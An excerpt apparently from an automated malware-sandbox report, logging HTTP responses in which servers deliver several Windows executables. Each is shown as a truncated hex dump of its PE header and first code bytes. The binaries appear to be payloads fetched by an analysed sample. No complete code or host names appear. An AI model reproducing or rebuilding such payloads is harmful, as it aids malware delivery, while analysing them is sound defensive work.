15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:02 GMTContent-Type: application/octet-streamContent-Length: 464896Last-Modified: Sat, 07 Sep 2024 22:52:49 GMTConnection: keep-aliveETag: "66dcd941-71800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 d8 dc 66 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 04 00 00 ca 02 00 00 00 00 00 76 6b 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 6b 04 00 4f 00 00 00 00 80 04 00 e4 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 07 00 0c 00 00 00 ec 69 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 4b 04 00 00 20 00 00 00 4c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 c6 02 00 00 80 04 00 00 c8 02 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 07 00 00 02 00 00 00 16 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 6b 04 00 00 00 00 00 48 00 00 00 02 00 05 00 28 36 00 00 94 2c 00 00 03 00 02 00 1e 00 00 06 bc 62 00 00 30 07 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 49 00 00 00 00 00 00 00 02 7e 14 00 00 0a 7d 01 00 00 04 02 28 15 00 00 0a 20 fc 05 00 00 28 16 00 00 0a 02 28 18 00 00 06 20 3c 15 00 00 28 16 00 00 0a 02 7b 03 00 00 04 72 01 00 00 70 6f 17 00 00 0a 14 16 8d 1b 00 00 01 6f 18 00 00 0a 26 2a 00 00 00 13 30 02 00 82 01 00 00 01 00 00 11 03 28 27 00 00 06 0a 06 20 d0 a7 75 d7 35 43 06 20 f3 77 29 46 35 18 06 20 43 a2 a1 36 3b d3 00 00 00 06 20 f3 77 29 46 2e 7d 38 4d 01 00 00 06 20 0a 64 3f 5e 3b f7 00 00 00 06 20 63 89 e9 9c 2e 50 06 20 d0 a7 75 d7 3b c6 00 00 00 38 2a 01 00 00 06 20 c9 4f 8e df 35 18 06 20 b6 6e 70 da 3b 9f 00 00 00 06 20 c9 4f 8e df 2e 76 38 0a 01 00 00 06 20 52 2c 0c e6 2e 57 06 20 80 1e 47 f3 3b 9d 00 00 00 06 20 42 fe 4a fc 2e 2f 38 ea 00 00 00 03 72 1f 00 00 70 28 19 00 00 0a 3a 9e 00 00 00 38 d5 00 00 00 03 72 27 00 00 70 28 19 00 00 0a 3a 8f 00 00 00 38 c0 00 00 00 03 72 2d 00 00 70 28 19 00 00 0a 3a 80 00 00 00 38 ab 00 00 00 03 72 35 00 00 70 28 1
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:05 GMTContent-Type: application/octet-streamContent-Length: 689664Last-Modified: Mon, 05 Aug 2024 00:09:39 GMTConnection: keep-aliveETag: "66b01843-a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a 18 b0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7a 0a 00 00 0a 00 00 00 00 00 00 6e 99 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 99 0a 00 57 00 00 00 00 a0 0a 00 20 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 79 0a 00 00 20 00 00 00 7a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 07 00 00 00 a0 0a 00 00 08 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 84 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 99 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 28 bc 05 00 ec dc 04 00 03 00 00 00 4a 05 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 f8 a3 0a 3e 6e c1 cd 91 38 a7 d0 e0 32 bc 14 61 78 1b 14 09 5e 73 28 4f 07 4c e1 b6 7e f1 67 e4 b1 e6 3f bb 1e ab ba 4d 36 e9 02 d7 b8 3b 0a 75 93 fc 12 ea b9 3d a5 6b f2 64 19 14 77 2d 58 5e d6 6b 7c da c2 65 97 b8 51 76 dd 69 a5 ef be 22 c6 6e cc d8 a6 07 89 85 f0 73 12 57 db 86 dc 44 6c b1 5c 73 f9 55 dc 92 ee 76 d9 ca 43 45 69 78 ed 96 31 12 9e 13 47 f0 df fb a4 35 03 81 65 4d 13 82 82 6b 92 db af 5b 1f d7 77 78 31 a3 d5 29 09 77 f6 cb cf 89 5f 85 ae 8e 54 70 8b 86 06 32 46 b8 c6 53 d9 01 55 8a 40 e0 36 1c 92 bf 27 cd e6 71 42 09 5d 4f 84 bd 99 52 ab c8 30 e3 2f 99 c7 91 ed 12 45 53 5f 7b 7c a1 c9 48 ea 3f f9 e4 0a 3c 81 77 90 eb c8 1e be 6d 19 fb 09 66 1f 54 0c c7 9c 65 be 5f bb 6c 07 67 cd be 11 0c 27 5d 90 10 5e d7 14 81 75 a5 18 6c 43 96 f5 f6 ab a2 0f 7b 98 0c 64 30 e0 b7 ca fd 73 9a 47 c2 d9 8d 91 d6 a0 46 6f 13 97 1b 1f 85 76 74 94 4c 32 6b 7c 77 1c a6 d3 53 72 de d8 fd 42 ea 31 1b 59 32 93 57 22 84 d1 95 0c 03 e3 2c 94 7
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:08 GMTContent-Type: application/octet-streamContent-Length: 1381143Last-Modified: Fri, 13 Sep 2024 12:59:12 GMTConnection: keep-aliveETag: "66e43720-151317"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 de 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 f0 47 00 00 04 00 00 f4 26 15 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 9e 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 9e 72 00 00 00 30 47 00 00 74 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 b0 47 00 00 34 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:12 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:18 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
